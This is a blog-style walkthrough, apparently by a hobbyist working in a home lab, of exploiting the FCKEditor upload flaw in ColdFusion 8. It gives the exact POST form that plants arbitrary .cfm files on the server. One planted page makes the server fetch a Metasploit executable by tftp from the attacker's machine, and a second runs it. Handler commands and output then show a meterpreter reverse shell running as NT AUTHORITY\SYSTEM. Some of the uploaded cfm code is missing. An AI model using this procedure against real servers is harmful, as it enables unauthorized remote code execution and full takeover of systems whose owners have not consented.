A few months ago Sans and a bunch of other media sources were posting about an old vulnerable version of FCKEditor embedded in Coldfusion 8. The vulnerable version is used in a Coldfusion upload feature which is enabled by default. A few days ago I installed CF on one of my VMs and thought I would mess around with it. The basic gist of the hack is to utilize the vulnerability in CF’s embedded FCKEditor by telling it to create a file by sending it a simple POST request. The POST request creates the file on the ColdFusion server allowing us to create whatever kind of files we want. One way to take advantage of this flaw is to have the ColdFusion webserver create a cfm file and have that cfm perform any the actions we want by uploading the desired code into the cfm file. For this example, I will have a POST request create a cfm file whose content is filled with the uploaded text we give it. The first cfm file created will download a payload and then the second will execute the payload.
The vulnerable page is located at
In order to take advantage of the vulnerability you have to send it a post request. So I created a small post form on my attacking box’s web server that will submit the post to the upload.cfm page.
<form action="http://192.168.1.101/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/grab-evil.cfm HTTP/1.1"
enctype="multipart/form-data" method="post">
<input type="file" name="NewFile" size="35">
<input type="submit" value="Upload">
</center></body></html>
The upload file we send it will populate the grab-evil.cfm. So we want to populate it with cfm. Now we need to figure out what we want the web server to do. This of course is up to you but in this example I am going to make it download a Metasploit payload. I want to use a meterpreter reverse tcp payload, so to create the payload we use msfpayload. Metasploit’s msfpayload is pretty simple, give it the payload name, the payload variables and X for PE executables or whatever you want to write it out as. For reverse payloads set your lhost to your Metasploit/Attacker IP, 192.168.1.2 in my example.
/tmp/evil.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Now we need to figure out a way to have the web server grab the exe. Tftp is a pretty common/simple way of transferring files and it is usually in the Windows Path, so I will have the content we feed into the grab-evil.cfm tftp the file from my machine to the victim. So setup tftpd or whatever you want for transferring the file. For Internet based machines ftp’ing the file by echo’ing the ftp commands might work better since FTP is probably more likely allowed.
In the file we upload it we tell it to tftp into our box and place the file in a location you think the web server can write to. Playing around with the web server can usually cause Coldfusion to generate some errors which might reveal the web server’s installation directory. Try going to some unknown locations in the hopes of enumerating the document root. Fortunately when you upload a file using the upload.cfm it creates a “userfiles\file” directory. If for some reason you can’t get this to work maybe try creating a directory on the server via the cfm or place it in a common place, “c:\windows\temp” or wherever. I placed the following in the file to upload using my post form.
<cfoutput>#data#</cfoutput>
Now we upload the file using our post submission page. The upload will then populate the grab-evil.cfm. Upon upload, the webserver will create a userfiles directory. Browse to that directory
and click the newly created grab-evil.cfm. When CF executes the grab-evil.cfm it will perform the actions we fed it. So if all goes right the web server will tftp into our box and grab the evil.exe. After accessing grab-evil.cfm you should see something like
and evil.exe should now be in the “userfiles/file” dir, so refresh.
All right, so now that we have our exe over on the server we need to create another cfm page but this one needs to execute evil.exe. So change the postform.html page to create a new page and create the cfm content to upload into the new page.
<formaction="http://192.168.1.101/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/run-evil.cfm HTTP/1.1"
enctype="multipart/form-data" method="post">
<input type="file" name="NewFile" size="35">
<input type="submit" value="Upload">
</center></body></html>
This content should execute the exe.
<cfoutput>#data#</cfoutput>
Upload the txt file and refresh the userfiles/file dir and you should see your new cfm page. Before you run the cfm page you need to get Metasploit ready for the meterpreter connection.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf exploit(handler) > set lport 4545
lport => 4545
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler
Now that the handler is waiting you can access the newly created run-evil.cfm and watch your Metasploit accept the connection
[*] Meterpreter session 1 opened (192.168.1.2:4545 -> 192.168.1.101:4230)
meterpreter >
meterpreter > sysinfo
Computer: CRAPTASTIC2003
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Meterpreter has so many awesome functions that you can spend hours playing around with it. This may not be the best approach and you may be able to string together the cf commands into one single cfm upload and there are multiple ways to get your payload over but whatever works for you. It’s not a very technical hack but it is pretty fun to play around with.